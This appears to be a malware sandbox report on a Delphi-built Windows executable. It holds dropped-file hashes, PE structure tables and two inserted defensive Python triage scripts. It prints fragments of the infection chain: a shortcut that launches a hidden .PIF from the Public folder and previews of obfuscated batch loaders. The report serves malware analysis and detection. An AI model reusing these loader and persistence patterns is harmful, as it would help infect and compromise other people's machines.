                                                            Size (bytes):104
                                                            Entropy (8bit):5.139114752324313
                                                            Encrypted:false
                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMV1EysbxpO1Afy:HRYFVmTWDyzNyExpLK
                                                            MD5:47C29599090276CDDA4AD978CBB59F05
                                                            SHA1:A01D97F71BBCAD1278AFA34D8C9CAC601181A054
                                                            SHA-256:5A50948B1C50FCC05C52D9AE176F70894AF2A5E6186224A93B2612B1D49ADC4E
                                                            SHA-512:F7B3E21AE048814EDEB4983A08D2A0A27B321E5B9863CF67A005F9DE232FC58CDA2631425D488957EC5D6D181D171E9775E4924F82691F620CB2C4CF9F1EC3F4
                                                            Malicious:true
                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Emxwenem.PIF"..IconIndex=947535..HotKey=42..
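The shortcut above is an ordinary [InternetShortcut] INI file whose URL= field uses the file: scheme to launch the dropped Emxwenem.PIF from C:\Users\Public\Libraries, which is why the report flags execution from a Public folder. The following Python is an added triage example, not code from the Joe Sandbox report: it parses such .url files and flags a local file: target with an executable extension or a target under a user-writable staging folder. The extension and folder lists are the editor's choices, and the sample text is constructed from the preview shown above.

```python
"""Triage Windows Internet Shortcut (.url) files that point at local executables.

Added example, not part of the sandbox report. Checks two properties of the
URL= field: a file: scheme target with an executable-type extension, and a
target under a folder any local user can write to.
"""
import ntpath
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed from the dropped shortcut's preview (CRLF line endings, literal
# doubled backslashes inside the quoted file: URL, as in the report).
SAMPLE_URL_FILE = (
    '[InternetShortcut]\r\n'
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Emxwenem.PIF"\r\n'
    'IconIndex=947535\r\n'
    'HotKey=42\r\n'
)

# Editor's lists (assumptions, not from the report): extensions Windows will run
# from a shortcut target, and typical user-writable staging folders.
EXECUTABLE_EXTENSIONS = {'.pif', '.exe', '.scr', '.com', '.bat', '.cmd', '.cpl', '.vbs',
                         '.vbe', '.js', '.jse', '.wsf', '.wsh', '.hta', '.lnk', '.msi', '.ps1'}
USER_WRITABLE_DIRS = ('c:\\users\\public\\', '\\programdata\\',
                      '\\appdata\\local\\temp\\', 'c:\\windows\\temp\\')

_FILE_URL = re.compile(r'^file:(?://)?"?(.*?)"?$', re.IGNORECASE)


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    fields: Dict[str, str] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].strip().lower()
            continue
        if section == 'internetshortcut' and '=' in line:
            key, value = line.split('=', 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def local_target(url: str) -> Optional[str]:
    """Windows path named by a file: URL (quoted or file:///C:/ form), else None."""
    m = _FILE_URL.match(url.strip())
    if not m:
        return None
    path = unquote(m.group(1)).replace('\\\\', '\\').replace('/', '\\')
    if re.match(r'^\\[A-Za-z]:', path):      # file:///C:/... leaves a leading separator
        path = path[1:]
    return path


def triage_url_file(text: str) -> Dict[str, object]:
    fields = parse_internet_shortcut(text)
    url = fields.get('url', '')
    target = local_target(url) if url else None
    findings: List[str] = []
    if target:
        ext = ntpath.splitext(target)[1].lower()
        if ext in EXECUTABLE_EXTENSIONS:
            findings.append(f'file: target with executable extension {ext}')
        if any(d in target.lower() for d in USER_WRITABLE_DIRS):
            findings.append('target sits in a user-writable staging folder')
    return {'url': url, 'target': target, 'findings': findings, 'suspicious': bool(findings)}


if __name__ == '__main__':
    print(triage_url_file(SAMPLE_URL_FILE))
```

A web URL in the same file yields no target and no findings, so the check only fires on shortcuts that launch something local; the extension list deliberately includes .pif, which Windows still treats as an executable despite the DOS-era name.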
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):15789
                                                            Entropy (8bit):4.658965888116939
                                                            Encrypted:false
                                                            SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                            MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                            SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                            SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                            SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                            Malicious:false
                                                            Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):847380
                                                            Entropy (8bit):7.404360654700282
                                                            Encrypted:false
                                                            SSDEEP:24576:ptIYYu1S1QfNWSb2euWo90fYXvjUtxs1nZ:DVnh/nE0fYXvqxs1nZ
                                                            MD5:8B54B08B2D95D05647C46402656B40AF
                                                            SHA1:1ED99BC0C8FA56E0FD68134B281C56CA0C60579E
                                                            SHA-256:869941F8AA6684C7BE48352941D75C9577CE2153B5EAA3F1F5F9AD8BD2EF602D
                                                            SHA-512:771ADFBCCDE1272143F8E2EE2720B2E605F399F29BF8FFF817FB4342BB13B593DD6CDD3D13F3BF55FE7B8AFF6752F9A9A46EE6F315D177478254C2A07CC74581
                                                            Malicious:true
                                                            Preview:...Y#..K...$.......!$!....#'.!.!.....!$..........%.....'.%...%'& ..."...#...'...#$..' ....'.'..$...Y#..KP.%$.....%....Y#..K...........V.@@/..`..".....">J...H....I....[..dL./W..W.%K..)..r...SJJ-....K>.4...q.>0...5....*k..&P.......,.J.z1q...c...[...z..cb..5.A..J.I..+V.......G|.V....Rz......8DJ..3......t$...VA:..w.V..'..D;=?-<.._:........]* ....!::.....q..S...Yo...V.@......%.........e...[V......>...8U...Y...3........X...<..C9..5......E.@...2..4a.Gu.q....l.....wc+..... ...aT...{...{Z=.C......*.......A...Q..dK.R.h....Y59|@@.....U.......P...4H...:.4p.D...C9.P.....< ..PE...SD....R.I.T.B9......4,,E.}...Z...#.y.s."...<.k..(....m...+..... 4...Z<..J..5.C8....,.,.o.3T"A.....R..F..#..E:=.......B//B|............u.h.x....t..U..}.....9.....................".L........+...8....,B..2SF.4.G...t*u.6.5.C..k......X.+.Z.P...V;<...V..x,?EJ.I...e...h....e..Wz.5.3I....H..\e.........u4J... .:..&....P..0..~W.o.............+....K..3....."....@...Y.w.....,..
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1362944
                                                            Entropy (8bit):7.346681623297669
                                                            Encrypted:false
                                                            SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhONqR:TtTiq973f
                                                            MD5:CCDCD04A0FFDE31366754018598EB02F
                                                            SHA1:38492826E8FEBF5BD7DA4F9D8A8379EC7044CA9A
                                                            SHA-256:63C77A3F6CFA94CBC6A4C0C1475F02520592E58D6A03E8553E77A85A3F03C32F
                                                            SHA-512:8059CF54A64B45598B39BECB3EC02FDF4B5837E4DD84AC82D33334850D61D1B33DF70DA0A65857C33E9A0FE2DC3D405BDBF6FA7214AB68E471E2E0C0F7E31053
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                            Joe Sandbox View:
                                                            • Filename: greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta, Detection: malicious, Browse
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..........................P...................@...........................p...*...@..........................H|...................................................w...............................text............................... ..`.itext..t........................... ..`.data...............................@....bss.....7...0...........................idata...*...p...,..................@....tls....4............@...................rdata...............@..............@..@.reloc..H|.......~...B..............@..B.rsrc........@......................@..@.............P......................@..@................................................................................................
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8556
                                                            Entropy (8bit):4.623706637784657
                                                            Encrypted:false
                                                            SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                            MD5:60CD0BE570DECD49E4798554639A05AE
                                                            SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                            SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                            SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                            Malicious:true
                                                            Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):46543
                                                            Entropy (8bit):4.705001079878445
                                                            Encrypted:false
                                                            SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                            MD5:637A66953F03B084808934ED7DF7192F
                                                            SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                            SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                            SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                            Malicious:false
                                                            Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):963
                                                            Entropy (8bit):5.018384957371898
                                                            Encrypted:false
                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                            MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                            SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                            SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                            SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.346681623297669
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.38%
                                                            • InstallShield setup (43055/19) 0.43%
                                                            • Windows Screen Saver (13104/52) 0.13%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            File name:SEPTobn3BR.exe
                                                            File size:1'362'944 bytes
                                                            MD5:ccdcd04a0ffde31366754018598eb02f
                                                            SHA1:38492826e8febf5bd7da4f9d8a8379ec7044ca9a
                                                            SHA256:63c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f
                                                            SHA512:8059cf54a64b45598b39becb3ec02fdf4b5837e4dd84ac82d33334850d61d1b33df70da0a65857c33e9a0fe2dc3d405bdbf6fa7214ab68e471e2e0c0f7e31053
                                                            SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhONqR:TtTiq973f
                                                            TLSH:AA55AF13939287A1D9255D7068DF69A65A18BF20EFB4C43A6FD17F4C8F39E0024B6D23
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                            Icon Hash:132bc3040b0b0b13
                                                            Entrypoint:0x47082c
                                                            Entrypoint Section:.itext
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:
                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (the fixed link timestamp that Borland/Delphi linkers emit regardless of build date, so it says nothing about when this sample was built; consistent with the MZP DOS stub and the TrID Delphi match above)
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2e10263a01b85d4d1c064ae3be7c8027
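The static fields above (MZP stub, 0x2A425E19 timestamp, 0x400000 image base, 0x47082c entry point, the Characteristics list and empty DLL Characteristics) can all be read from the first few hundred bytes of the file. The Python below is an added example by the editor, not Joe Sandbox code: it parses the DOS, COFF and optional headers with struct alone, decodes the flags, converts the timestamp to UTC and reports the two things a triager should note here: the fixed Delphi timestamp and the absence of the DYNAMIC_BASE and NX_COMPAT opt-ins. build_sample_pe() constructs a minimal header with the report's values so the code runs offline; it is not the real sample.

```python
"""Static PE header triage with struct only (no pefile dependency).

Added example, not from the sandbox report. Parses the headers, decodes COFF
Characteristics, converts TimeDateStamp to UTC, and flags the fixed timestamp
0x2A425E19 that Borland/Delphi linkers emit plus missing ASLR/DEP opt-ins.
"""
import struct
from datetime import datetime, timezone
from typing import Dict, List

DELPHI_FIXED_TIMESTAMP = 0x2A425E19

COFF_CHARACTERISTICS = {
    0x0001: 'RELOCS_STRIPPED', 0x0002: 'EXECUTABLE_IMAGE', 0x0004: 'LINE_NUMS_STRIPPED',
    0x0008: 'LOCAL_SYMS_STRIPPED', 0x0020: 'LARGE_ADDRESS_AWARE', 0x0080: 'BYTES_REVERSED_LO',
    0x0100: '32BIT_MACHINE', 0x0200: 'DEBUG_STRIPPED', 0x2000: 'DLL', 0x8000: 'BYTES_REVERSED_HI',
}
DLLCHAR_DYNAMIC_BASE = 0x0040   # image may be relocated by ASLR
DLLCHAR_NX_COMPAT = 0x0100      # image opts in to DEP


def parse_pe_headers(data: bytes) -> Dict[str, object]:
    if len(data) < 0x40 or data[:2] != b'MZ':
        raise ValueError('missing MZ signature')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    coff = e_lfanew + 4
    machine, nsections, stamp, _symtab, _nsyms, _opt_size, chars = \
        struct.unpack_from('<HHIIIHH', data, coff)
    opt = coff + 20                                    # COFF file header is 20 bytes
    magic = struct.unpack_from('<H', data, opt)[0]
    entry = struct.unpack_from('<I', data, opt + 16)[0]
    if magic == 0x10B:                                 # PE32
        image_base = struct.unpack_from('<I', data, opt + 28)[0]
    elif magic == 0x20B:                               # PE32+
        image_base = struct.unpack_from('<Q', data, opt + 24)[0]
    else:
        raise ValueError('unknown optional header magic 0x%x' % magic)
    subsystem, dll_chars = struct.unpack_from('<HH', data, opt + 68)
    return {
        'dos_stub': bytes(data[:3]),
        'machine': machine,
        'sections': nsections,
        'timestamp': stamp,
        'timestamp_utc': datetime.fromtimestamp(stamp, timezone.utc).strftime('%Y-%m-%d %H:%M:%S'),
        'characteristics': [n for bit, n in COFF_CHARACTERISTICS.items() if chars & bit],
        'entry_point': entry,
        'image_base': image_base,
        'subsystem': subsystem,
        'dll_characteristics': dll_chars,
    }


def triage_pe(data: bytes) -> List[str]:
    h = parse_pe_headers(data)
    findings: List[str] = []
    if h['timestamp'] == DELPHI_FIXED_TIMESTAMP:
        findings.append('TimeDateStamp 0x2A425E19 is the fixed Delphi linker constant; build date unknown')
    if h['dos_stub'] == b'MZP':
        findings.append('MZP DOS stub: Borland/Delphi linker')
    if not h['dll_characteristics'] & DLLCHAR_DYNAMIC_BASE:
        findings.append('DYNAMIC_BASE not set: image loads at its fixed base (no ASLR)')
    if not h['dll_characteristics'] & DLLCHAR_NX_COMPAT:
        findings.append('NX_COMPAT not set: DEP not opted in')
    return findings


def build_sample_pe(timestamp: int = DELPHI_FIXED_TIMESTAMP, stub: bytes = b'MZP',
                    dll_chars: int = 0) -> bytes:
    """Minimal PE32 header carrying the report's values (constructed, not the real file)."""
    dos = bytearray(0x40)
    dos[:len(stub)] = stub
    struct.pack_into('<I', dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack('<HHIIIHH', 0x014C, 8, timestamp, 0, 0, 0xE0, 0x818E)
    opt = bytearray(0xE0)
    struct.pack_into('<H', opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into('<I', opt, 16, 0x7082C)                     # AddressOfEntryPoint (0x47082C - base)
    struct.pack_into('<I', opt, 28, 0x400000)                    # ImageBase
    struct.pack_into('<HH', opt, 68, 2, dll_chars)               # Subsystem GUI, DllCharacteristics
    return bytes(dos) + b'PE\0\0' + coff + bytes(opt)


if __name__ == '__main__':
    sample = build_sample_pe()
    print(parse_pe_headers(sample))
    for f in triage_pe(sample):
        print('-', f)
```

Characteristics 0x818E decodes to exactly the six flags the report lists, and DllCharacteristics 0 matches its empty "DLL Characteristics" line; on the real file, feeding the first 0x200 bytes to parse_pe_headers() is enough, since nothing past the optional header is read.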
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFF0h
                                                            mov eax, 0046F39Ch
                                                            call 00007F5E34DC1839h
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F5E34E1AFC1h
                                                            mov ecx, dword ptr [004729F8h]
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            mov edx, dword ptr [0046CDDCh]
                                                            call 00007F5E34E1AFC1h
                                                            mov eax, dword ptr [00472C24h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F5E34E1B035h
                                                            call 00007F5E34DBF528h
                                                            lea eax, dword ptr [eax+00h]
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x77000 | 0x2a88 | .idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0xd0c00 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0x7c48 | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x7b000 | 0x18 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x777dc | 0x69c | .idata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0x6e60c | 0x6e800 | 7f88a60478da2b59059ac9020a731125 | False | 0.5148804263291855 | data | 6.52663869684443 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .itext | 0x70000 | 0x874 | 0xa00 | 1d2f13587195bd07d0eacaf37f6bce18 | False | 0.53359375 | data | 5.614686748854788 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data | 0x71000 | 0x1ddc | 0x1e00 | 64398b74c9b81658dc6c1c0840194ed3 | False | 0.40924479166666666 | data | 3.912605066546787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .bss | 0x73000 | 0x3700 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata | 0x77000 | 0x2a88 | 0x2c00 | e6a0c30232a0c925db3f0b1f9f0c28e7 | False | 0.3114346590909091 | data | 5.108538589937939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls | 0x7a000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata | 0x7b000 | 0x18 | 0x200 | c82cfd34222b3044514069e79ad6ba11 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x7c000 | 0x7c48 | 0x7e00 | 2d8e689e68215d8c5822f613430c661e | False | 0.6173735119047619 | data | 6.676175097423695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x84000 | 0xd0c00 | 0xd0c00 | 51d994c39d421963d0ef160af1c8cab1 | False | 0.5735380800898203 | data | 7.474931732078971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_CURSOR | 0x85334 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                                                            RT_CURSOR | 0x85468 | 0x134 | data | English | United States | 0.4642857142857143
                                                            RT_CURSOR | 0x8559c | 0x134 | data | English | United States | 0.4805194805194805
                                                            RT_CURSOR | 0x856d0 | 0x134 | data | English | United States | 0.38311688311688313
                                                            RT_CURSOR | 0x85804 | 0x134 | data | English | United States | 0.36038961038961037
                                                            RT_CURSOR | 0x85938 | 0x134 | data | English | United States | 0.4090909090909091
                                                            RT_CURSOR | 0x85a6c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                                                            RT_BITMAP | 0x85ba0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                            RT_BITMAP | 0x85d70 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                                                            RT_BITMAP | 0x85f54 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                            RT_BITMAP | 0x86124 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                                                            RT_BITMAP | 0x862f4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                                                            RT_BITMAP | 0x864c4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                                                            RT_BITMAP | 0x86694 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                                                            RT_BITMAP | 0x86864 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                            RT_BITMAP | 0x86a34 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                                                            RT_BITMAP | 0x86c04 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                            RT_BITMAP | 0x86dd4 | 0x7dab0 | Device independent bitmap graphic, 942 x 182 x 24, image size 514696 | English | United States | 0.6317840601784216
                                                            RT_BITMAP | 0x104884 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.39864864864864863
                                                            RT_BITMAP | 0x1049ac | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                            RT_BITMAP | 0x104ad4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                            RT_BITMAP | 0x104bfc | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                                                            RT_BITMAP | 0x104ce4 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3614864864864865
                                                            RT_BITMAP | 0x104e0c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                            RT_BITMAP | 0x104f34 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.49038461538461536
                                                            RT_BITMAP | 0x105004 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3716216216216216
                                                            RT_BITMAP | 0x10512c | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.2905405405405405
                                                            RT_BITMAP | 0x105254 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.38175675675675674
                                                            RT_BITMAP | 0x10537c | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                            RT_BITMAP | 0x1054a4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                                                            RT_BITMAP | 0x1055cc | 0xe8 | Device independent bitmap graphic, 12 x 16 x 4, image size 128 | English | United States | 0.3620689655172414
                                                            RT_BITMAP | 0x1056b4 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                                                            RT_BITMAP | 0x1057dc | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.375
